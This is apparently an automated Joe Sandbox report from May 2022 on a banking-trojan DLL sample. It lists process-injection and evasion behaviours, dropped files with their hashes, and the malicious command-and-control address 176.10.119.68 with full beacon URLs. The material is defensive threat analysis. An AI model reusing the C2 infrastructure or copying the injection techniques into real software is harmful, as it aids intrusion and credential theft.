    signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
    explorer.exe (injected)
      network: 192.168.2.1 unknown unknown
      signatures: Changes memory attributes in foreign processes to executable or writable; Self deletion via cmd delete; Maps a DLL or memory area into another process; 2 other signatures
      cmd.exe (started)
        signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
        conhost.exe (started)
        PING.EXE (started)
    csc.exe 3 (started)
      dropped: C:\Users\user\AppData\Local\...\vebwfha3.dll, PE32
      cvtres.exe (started)
    csc.exe (started)
      dropped: C:\Users\user\AppData\Local\...\hpvnexdj.dll, PE32
      cvtres.exe (started)
    conhost.exe (started)
loaddll32.exe 1 (started)
  cmd.exe 1 (started)
    rundll32.exe 1 6 (started)
      network: 176.10.119.68, 49770, 80 AS-SOFTPLUSCH Switzerland
      signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Writes registry values via WMI
      control.exe (started)
        signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
  WerFault.exe 3 9 (started)
  WerFault.exe 9 (started)
  WerFault.exe 3 9 (started)



Source | Detection | Scanner | Label | Link
628df1368bdb5.dll | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link | Download
2.2.rundll32.exe.1350000.0.unpack | 100% | Avira | HEUR/AGEN.1245293 | | Download File

No Antivirus matches
Source | Detection | Scanner | Label | Link
http://176.10.119.68/ | 100% | Avira URL Cloud | phishing |
http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk | 100% | Avira URL Cloud | phishing |
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk | 100% | Avira URL Cloud | phishing |
https://contoso.com/ | 0% | URL Reputation | safe |
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe |
http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2Fxy | 100% | Avira URL Cloud | phishing |
http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/ | 100% | Avira URL Cloud | phishing |
http://176.10.119.68/=i_ | 100% | Avira URL Cloud | phishing |
http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk | 100% | Avira URL Cloud | phishing |
http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4V | 100% | Avira URL Cloud | phishing |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk | true | Avira URL Cloud: phishing | unknown
http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk | true | Avira URL Cloud: phishing | unknown
http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk | true | Avira URL Cloud: phishing | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://176.10.119.68/ | rundll32.exe, 00000002.00000003.339926969.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329887519.0000000003510000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://constitution.org/usdeclar.txt | rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2Fxy | rundll32.exe, 00000002.00000003.329876196.00000000034F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/ | rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://176.10.119.68/=i_ | rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000001A.00000002.469002593.0000021CAB3F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4V | rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453537625.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
176.10.119.68 | unknown | Switzerland | | 51395 | AS-SOFTPLUSCH | true
                                  IP
                                  192.168.2.1
                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:633910
Start date and time:2022-05-25 11:16:12 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 31s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:628df1368bdb5.dll
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:45
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.bank.troj.evad.winDLL@28/31@0/2
                                  EGA Information:
                                  • Successful, ratio: 75%
                                  HDC Information:
                                  • Successful, ratio: 75.9% (good quality ratio 55.6%)
                                  • Quality average: 60.4%
                                  • Quality standard deviation: 41.4%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .dll
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Override analysis time to 240s for rundll32
                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                  • TCP Packets have been reduced to 100
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.43.16, 20.42.73.29
                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, time.windows.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6924 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • VT rate limit hit for: 628df1368bdb5.dll
Time | Type | Description
11:17:27 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
11:18:03 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
11:18:13 | API Interceptor | 26x Sleep call for process: powershell.exe modified
11:19:03 | API Interceptor | 1x Sleep call for process: explorer.exe modified
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.745764915476303
                                  Encrypted:false
                                  SSDEEP:96:5XFUEWnYyMy9haoCjmfspXIQcQ5c6cEcE2cw3+G+a+z+HbHgVownOgtYsXqOEX/J:pyJnsHXJ8K0jeq/u7slS274ItW
                                  MD5:6D0CE1AA8EB405757DBA87A6C96DD333
                                  SHA1:545B384FB1051CD8DA5C7F622556669D68F13FAF
                                  SHA-256:CAD3CB3C6CB1EF7CE6B5ADC19F8504D0CC695A4DF908900FAFFEA5AE8799592B
                                  SHA-512:68B82D10BD6333B4B07849741750C2B46E1BD20060FFFF33841355504A35B2569087D17C87F08BEDD51C26786B336AB41370D4D4FF18226A0E44E06035041612
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.7421039220862186
                                  Encrypted:false
                                  SSDEEP:96:/49WnYysy9haoCj+ASZpXIQcQGc6McE+cw3/7+a+z+HbHgVownOgtYsXqOEX/vFc:/1nrHoIE/jeq/u7slS274Itb
                                  MD5:D85313EAEA6452E5F2371E06EB498FA9
                                  SHA1:6A5708166DC83214B26C58B9D372754158B93C1E
                                  SHA-256:29963CA5DC704D111EFF54B0A07AA35C1B9937BA3BE5AA382C91D4FACAD4830C
                                  SHA-512:1F1E645A89F258FD23770E643B1804C96E96C84F0A4F251871B9378A012BC2387FDCFEBFA6CCF196E66A5EA2EAF7C0180E58424699D0B999520A7DF0C52DE51A
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.7487188306064417
                                  Encrypted:false
                                  SSDEEP:96:s7JFMccWnYyjy9haoB7Jn4pXIQcQGc6McE+cw3/7+a+z+HbHgVownOgtYsXqOEXR:st5nZHoIE/jeq/u7slS274ItW
                                  MD5:543A245C1119F433D655909A71EBD139
                                  SHA1:3796002B474B2E1348C7D3CB22BB5CEC0E195293
                                  SHA-256:6D2ED7900DCF11A1F5B7ECA510ABE1275EE048A9758FE70BC1DA11DBE9A66080
                                  SHA-512:50B652E678D41E274E46B1DF92F9CA3D0EF911B89E22A8EB59877FE6F5879F75624BDA790301F97E90E701907A4ACA673CB3335F4A14F0A2AAE773085B4E1A3D
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4598
                                  Entropy (8bit):4.465700585531507
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsRjiJgtWI9sKWgc8sqYjK8fm8M4J2+UZF9R+q84lh1KcQIcQw05d:uITfR8DrgrsqYrJCrb1Kkw05d
                                  MD5:199DA7379200C4E0E164C00B3583CCEE
                                  SHA1:E3DB6D40367CEA92A736F85772C327BF04913ABD
                                  SHA-256:63CD40169DB3BEFF9C2B0D7432F16FBF4E71AEBE76812C8809691E80491B7458
                                  SHA-512:346FB7EF14A05C1564B4E6FCA935BE749AEDA3469AE411272BBB4E713F1ED385C6DA6471140E0FA03F1806B4797D5B738713CB6E2C67732C5595C4640E0F9B73
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:18:06 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):52470
                                  Entropy (8bit):2.1572306080657984
                                  Encrypted:false
                                  SSDEEP:192:1dO/k650mOn6p8ax4uVgM0YJKHkH/QqvOO8kVVugFcuGiMIthxziNZpCjQbhl6vo:TWMn6p8a6QgOoPqvjZsUxDMIsNZCw
                                  MD5:1784E4C57925E4297CA13484763EF34F
                                  SHA1:AB10CE4EF10801BA0C545BFB62481F7D86250D4E
                                  SHA-256:E06B887BE0BE2C72F1156786010743EADC7E4D8333A098B28572AE6E5395B24F
                                  SHA-512:7FE190A900D5AC4F2340B1353E1ADBCD664353F887F1CBCD91BCCBC0BD103B56E4CFDEBAE9652AB765CABFDF7A5D32582CC9F131FB3DD54E8D592DEE4CA0D8FE
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8298
                                  Entropy (8bit):3.6895098230001713
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNieZ6bywm6Y4iSUn1wgmfHSDluF+pDo89bcrsfC6Um:RrlsNiI6uwm6YtSUn1wgmfHSD3cwfC4
                                  MD5:6DAF60975F19E781170EEAB7A9EDD920
                                  SHA1:E9C3C282C88F039EE985EDA2F9008C0745262BB5
                                  SHA-256:91D4E72819EB6B4EE6730FBD4DC4F463AB2DC38733BC289F32FC44E3590B591E
                                  SHA-512:BA408D8B858CB4C7ACB532AA7F2C7B399BD0B75C161F6B96065D4982E8638E81D9F60948FC6A647C3A003656453D565F38A2158CE01C2116542FC4903993053C
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4564
                                  Entropy (8bit):4.4295856797524245
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsRjiJgtWI9sKWgc8sqYjv98fm8M4J2+eFdy+q84tnKcQIcQw05d:uITfR8DrgrsqY+JCyxKkw05d
                                  MD5:16B6D4E0C2DEB8065E7983CD830F569E
                                  SHA1:1A10ECA9E35D27E8C4BCFBC1B9BAE308CFC9DF19
                                  SHA-256:2163D18F061F6F3F668BA5523DA52B8DC369F2280B14D8F40DF62107D771D284
                                  SHA-512:DE9F5506E8F66BD2C88462D2EE8CD17CBB30A49EAE76F11A48C49045948F73C12F870ACDF5A11A83C0A1AB6D4BBD619C471DCA78D270C9A771F5802139B682CD
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8334
                                  Entropy (8bit):3.696770086623689
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiea6bfsJF6Y4ESUvygmfdSTuF+prt89bGrsfBim:RrlsNiz6AL6Y7SUvygmfdS2Gwfl
                                  MD5:B4F2249C9E1E95ACD23328456F73501B
                                  SHA1:EDBE451D27E46ABF17BC19DF0C19730C97C3CB3C
                                  SHA-256:055D2B211EB4B6A4BF5FBC6AF6EAEE51954B7DF11DD839490F9E8B8ABA60BF58
                                  SHA-512:BE42FED65F24C0048AED342EF64FDFEEA225FDDA52B0195E0546A09009ADC89A48304CB9131C6E9AE0112EDA97C1758548EC14924100309BF1328B6B50F5EF1E
                                  Malicious:false
                                   Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3412</Pid>..
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:17:26 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):35550
                                  Entropy (8bit):2.0449694115507002
                                  Encrypted:false
                                  SSDEEP:96:548o0Z8NGYN/PstghMlut4oi7naA7gY9Ia8a8gBIto0yuzGOEpGWInWIBcI4ig+U:NoN/kFlutFOnDp8aPIth0diruwcHgMc
                                  MD5:65FDC72CD726599D759E7274DC60A636
                                  SHA1:87C8F17966167B2DB369AD804DD25B812CC37E95
                                  SHA-256:FE3418CBA4A861A752455C666FD015DE45658246AC0E46393CA6D7AA7B2EBD9D
                                  SHA-512:273F1D2370821747AFF41310A0C146BB953EC19F37B6F2C87EF8B6CF3D57CD24B1E53F79DB75C17AC2ACF966A8192E17884C90B21245C9F2F100ECC7CC436B20
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8352
                                  Entropy (8bit):3.687428412738391
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNieZ6bfz7W6Y4/SU/agmfkSTuF+pN189bxD1fLbm:RrlsNig6rW6YQSU/agmfkSIxxf2
                                  MD5:74FD9B92F0E260377AB81BC69FE93DC8
                                  SHA1:4618059F78DB06C897B098699E20FC15CE20A8D5
                                  SHA-256:94D9D3951703CF77FD2FBE3D2BBE5D0D85D80E8681A82F06F792D7D3E8A6C4BF
                                  SHA-512:3B4281E2D7632A7424E9755F6E37E95D6BAAB742A3A95A223BE67737234CFB034F1A3547866CD26DBDDC64B51A0D4FA82486D7BA5016F717CDAB6673094368F0
                                  Malicious:false
                                   Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>3412</Pid>..
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4665
                                  Entropy (8bit):4.416956728965737
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsRjiJgtWI9sKWgc8sqYjS8fm8M4J2+RF9+q8vQ+dKcQIcQw0Id:uITfR8DrgrsqYTJbKBKkw0Id
                                  MD5:4019014DD19B29109C956D908BC3CAEA
                                  SHA1:047E7CC508262D828C3A4BDAC8439C29C137A0BC
                                  SHA-256:89310B171B8E13456D30A99F98D4F70428B84B46C8A1D5B5EC0BF56999A74A38
                                  SHA-512:415BF93CCF4EC5658B3865E438E2DD27D3EEA3E906CAD5D3BFFF8161E9C16C7C1B495CA60F7E1D551AB4BBF13299C34AF553BFF03AADA7EC810204977BF34D7E
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:17:29 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):35350
                                  Entropy (8bit):1.98471013299236
                                  Encrypted:false
                                  SSDEEP:192:mtt/krdbnOnytIth8di+XxMn2c3DQ7KTeS:nxbOnAIz+X6LR
                                  MD5:9DAEE98C2C818C4484FA218950E2FE8D
                                  SHA1:D860AF829B2271F1B20B13AA6C0092CC32875001
                                  SHA-256:7C35E1635A387BE99A9D3831C457A0ED5D840DF38FEAD0257886429CE85C94ED
                                  SHA-512:1BB87A5E1EB992306ACA54F950EDA5C604C42F93A993EC9D0FCE76EE0CE669B46D176EDBBA24798ED0C1DD9B1E2DB7342D6986680F470D7E5B7E1DD3AA13FAAF
                                  Malicious:false
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):11606
                                  Entropy (8bit):4.8910535897909355
                                  Encrypted:false
                                  SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                  MD5:F84F6C99316F038F964F3A6DB900038F
                                  SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                  SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                  SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                  Malicious:false
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1192
                                  Entropy (8bit):5.325275554903011
                                  Encrypted:false
                                  SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                  MD5:05CF074042A017A42C1877FC5DB819AB
                                  SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                  SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                  SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                  Malicious:false
